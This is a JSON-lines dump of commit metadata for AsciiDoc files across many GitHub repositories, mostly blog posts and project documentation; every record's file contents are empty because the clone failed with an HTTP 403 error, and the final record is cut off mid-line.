{"commit":"7ae6260b4acd3786a9e6ef04174bd43096c34d81","subject":"add doc\/Roadmap.adoc","message":"add doc\/Roadmap.adoc\n","repos":"johnwalker\/datastore,migae\/datastore","old_file":"doc\/Roadmap.adoc","new_file":"doc\/Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johnwalker\/datastore.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"b933214dcd718a19ac5a9a666883ed5b90e80441","subject":"[DOCS] Adding shared x-pack-settings file.","message":"[DOCS] Adding shared x-pack-settings file.\n\nOriginal commit: elastic\/x-pack-elasticsearch@2b74fab7728b58c981b20b6b0452640b57ad2142\n","repos":"scorpionvicky\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/settings\/x-pack-settings.asciidoc","new_file":"docs\/en\/settings\/x-pack-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"28f7e50d3d6c4408c5c2b3271767790d6f2e6fa3","subject":"Create 210.adoc","message":"Create 210.adoc","repos":"camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/changelog\/210.adoc","new_file":"docs\/src\/main\/asciidoc\/changelog\/210.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"05cab07be946ad70e9f70296c825721588b1250b","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"8e6389753d4ad39bece316e260cd25a48bcef85f","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"6d31b34772cf3e9d5c8ecea600886760379d3936","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"de556ce3111bf15dd848f9151de726df1626390b","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a14775c4efb8f84d1b3fa9310790c5d68e99e073","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"37e6d7bb2def18b124c9d09df203458e6bc5a937","subject":"Update 2016-05-20-Assumptions-driven-development.adoc","message":"Update 2016-05-20-Assumptions-driven-development.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"87631198463c92b1ea59a3b6999ba4fc099527fb","subject":"Update 2016-01-12-Azure-performance-benchmark.adoc","message":"Update 2016-01-12-Azure-performance-benchmark.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-Azure-performance-benchmark.adoc","new_file":"_posts\/2016-01-12-Azure-performance-benchmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"cb92778d4ba7271ab18ed9f9a8af265a3ddf5db6","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"38dc0be4c1eeb1ad26c386b446b77040b3c04dc8","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/07\/08\/deref.adoc","new_file":"content\/news\/2022\/07\/08\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"68863c8a85878861fb5badf8e0813cee24cf7ccc","subject":"Update 2019-01-26-true-source.adoc","message":"Update 2019-01-26-true-source.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-01-26-true-source.adoc","new_file":"_posts\/2019-01-26-true-source.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d34037d7dabd6531889c5fb44edd185c6dfcbb05","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"84c325d502d8d41ecc7d22e861f8adb715069cda","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"022f0016119bbd0e5fb7aa5688de79cee8f63395","subject":"Update 2017-07-03-This-is-a-test-post.adoc","message":"Update 2017-07-03-This-is-a-test-post.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-03-This-is-a-test-post.adoc","new_file":"_posts\/2017-07-03-This-is-a-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f857d992230306a8e56f8abff1e28a68d9856c4d","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"60ddb8333a694b8d8de27a88ec814eeb63d1178c","subject":"Update 2016-06-13-Remember-me.adoc","message":"Update 2016-06-13-Remember-me.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-13-Remember-me.adoc","new_file":"_posts\/2016-06-13-Remember-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1ac453988a65f4eff15e92eea64cab232b91b284","subject":"Update 2017-04-01-Prose-2-new.adoc","message":"Update 2017-04-01-Prose-2-new.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-01-Prose-2-new.adoc","new_file":"_posts\/2017-04-01-Prose-2-new.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3a2131f8c1604bdcea31fc6342c05ec1bdb761bb","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"33969994cd7967f5554c1c57448059a7421571a9","subject":"Deleted _posts\/2016-03-18-Introduction-a-Bitcoin.adoc","message":"Deleted _posts\/2016-03-18-Introduction-a-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a2ee24bd093d80222e5739c96be78cf4f376bd1c","subject":"Update 2015-07-07-CoreText-part-1.adoc","message":"Update 2015-07-07-CoreText-part-1.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-07-07-CoreText-part-1.adoc","new_file":"_posts\/2015-07-07-CoreText-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c9f7c98b1085573080dd3677ba468e429f1d8b8d","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c72ff030c8daa638dec3138e834309ae81000a","subject":"docs: Add SELL_IT.adoc document (spacetec)","message":"docs: Add SELL_IT.adoc document (spacetec)\n","repos":"veeg\/disir-c,veeg\/disir-c","old_file":"doc\/SELL_IT.adoc","new_file":"doc\/SELL_IT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/veeg\/disir-c.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a54510ba73db31b40657344627ca2be6960c138","subject":"Add a little bit of documentation about foldable.","message":"Add a little bit of documentation about foldable.\n","repos":"OlegTheCat\/cats,alesguzik\/cats,funcool\/cats,yurrriq\/cats,mccraigmccraig\/cats,tcsavage\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8c566dd73ffc5736afa457662726922a3b804368","subject":"Add firewall config notes for Bryn","message":"Add firewall config notes for Bryn\n","repos":"jflory7\/infrastructure,jflory7\/infrastructure","old_file":"docs\/bryn.adoc","new_file":"docs\/bryn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jflory7\/infrastructure.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"c3b658df8829bf5f33e5afb7537cb53186547434","subject":"[DOCS] Fixed broken link to put watch API","message":"[DOCS] Fixed broken link to put watch API\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@f36caaa371c32cd0074f91c6600107a8c9690fe4\n","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/watcher\/how-watcher-works.asciidoc","new_file":"docs\/en\/watcher\/how-watcher-works.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8c7635697efaf6d38501f2dbe480cf639c165c4","subject":"Update 2015-05-26-TEST.adoc","message":"Update 2015-05-26-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d4e34a59f9e307b01c746f009f64e43c9278f24","subject":"Issue #224 Add release instructions","message":"Issue #224 Add release instructions\n","repos":"redhat-kontinuity\/catapult,redhat-kontinuity\/catapult,redhat-developer-tooling\/katapult,redhat-kontinuity\/catapult","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-kontinuity\/catapult.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"701408c804392d50aa5c3b2ad446e5671401b229","subject":"Update 2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","message":"Update 2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03b872703730a72292dac24313835c1cf273f73f","subject":"Extension registry user documentation","message":"Extension registry user 
documentation\n\nCo-authored-by: Guillaume Smet <guillaume.smet@gmail.com>\n\nCo-authored-by: Erin Schnabel <ebullientworks@gmail.com>\n\nCo-authored-by: George Gastaldi <94a145309f176a79f8cd943f168fb7aaebdbfc96@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/extension-registry-user.adoc","new_file":"docs\/src\/main\/asciidoc\/extension-registry-user.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02864dbc86bf4a77ee20f3e7ff15949770023774","subject":"Update 2016-09-05-A-few-left-problems.adoc","message":"Update 2016-09-05-A-few-left-problems.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-05-A-few-left-problems.adoc","new_file":"_posts\/2016-09-05-A-few-left-problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b3fac174db42aa7944d6e606a17d5ca1ae66715","subject":"Bootstrapping Spinnaker Deployment Services","message":"Bootstrapping Spinnaker Deployment Services\n","repos":"spinnaker\/spinnaker,riguy724\/spinnaker.github.io,duftler\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,Roshan2017\/spinnaker,erjohnso\/spinnaker.github.io,spinnaker\/spinnaker,tgracchus\/spinnaker,skim1420\/spinnaker,duftler\/spinnaker,duftler\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,jtk54\/spinnaker,stitchfix\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,spinnaker\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker,riguy724\/spinnaker.github.io,duftler\/spinnaker,jtk54\/spinnaker,jtk54\/spinnaker,erjohnso\/spinnaker.github.io,skim1420\/spinnaker,ewiseblatt\/spinnaker,stitchfix\/spinnaker,stitchfix\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker","old_file":"bootstrapping-spinnaker-deployment-services.adoc","new_file":"bootstrapping-spinnaker-deployment-services.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"039a103f11db7386594735f483e49b74fb403c76","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"d9685c5edd7b56f6003cdd4f96fcc2a9783b0d88","subject":"updating to WildFly Swarm + MySQL sample application","message":"updating to WildFly Swarm + MySQL sample application\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ad222a82a1026e2a117ed6fcff5c55bc41fa4f2","subject":"Adding Code-of-Conduct (#171)","message":"Adding Code-of-Conduct (#171)\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aae430295ad1c569f61949e1b16c43c9fb7ebd1f","subject":"devdoc: added information on how to build and publish Javascript client","message":"devdoc: added information on how to build and publish Javascript client\n","repos":"canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin","old_file":"docs\/development\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/development\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"514c30103584a6845f757251908756047b5bb0b1","subject":"y2b create post iPhone 4S Review","message":"y2b create post iPhone 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-17-iPhone-4S-Review.adoc","new_file":"_posts\/2011-10-17-iPhone-4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5897f1ba4548e3b083a8b2269235c4fcb6bb21b1","subject":"Update 2015-10-18-Livros-de-Prolog.adoc","message":"Update 2015-10-18-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-10-18-Livros-de-Prolog.adoc","new_file":"_posts\/2015-10-18-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310bae5000ec4d648094e1728170bb8a3ecae072","subject":"Update 2017-07-18-Makes-You-Wonder.adoc","message":"Update 
2017-07-18-Makes-You-Wonder.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-07-18-Makes-You-Wonder.adoc","new_file":"_posts\/2017-07-18-Makes-You-Wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd30740dc51adf60620930fcc3a3c977e7d06444","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ntfnd\/ntfnd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99c90d587f438b2c70484474d7d1987903b8cff7","subject":"Update 2016-11-16-iOS-Team-Provisioning-Profile.adoc","message":"Update 2016-11-16-iOS-Team-Provisioning-Profile.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-11-16-iOS-Team-Provisioning-Profile.adoc","new_file":"_posts\/2016-11-16-iOS-Team-Provisioning-Profile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6871bdf9aa3f0a38599e63e2f5cb0532fdbff5","subject":"Update 2016-08-03-Hello.adoc","message":"Update 